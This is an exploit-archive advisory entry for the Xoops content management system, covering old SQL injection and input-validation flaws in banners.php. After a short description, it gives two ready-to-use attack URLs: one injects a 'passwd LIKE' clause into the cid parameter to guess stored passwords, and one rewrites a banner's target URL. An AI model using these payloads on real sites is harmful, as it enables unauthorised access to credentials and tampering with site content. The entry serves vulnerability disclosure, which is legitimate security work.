Xoops 1.3.x/2.0.x - Multiple Vulnerabilities
| EKU-ID: 28863 | CVE: OSVDB-4596 | OSVDB-ID: |
| Author: frog | Published: 2003-12-06 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28863 | CVE: OSVDB-4596 | OSVDB-ID: |
| Author: frog | Published: 2003-12-06 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/9166/info Multiple vulnerabilities were reported in Xoops. These issues include SQL injection and input validation issues that will allow remote attackers to manipulate banners and local variables. Exploitation could compromise the software or have other consequences. http://www.example.com/banners.php?op=EmailStats&cid=1%20AND%20passwd%20LIKE%20'a%' /* http://www.example.com/banners.php?op=Change&cid=-1&bid=100&url=HTTP://WWW.NEWURL.C OM